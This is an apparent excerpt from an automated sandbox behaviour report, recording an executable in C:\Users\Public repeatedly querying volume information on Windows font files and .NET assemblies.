Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
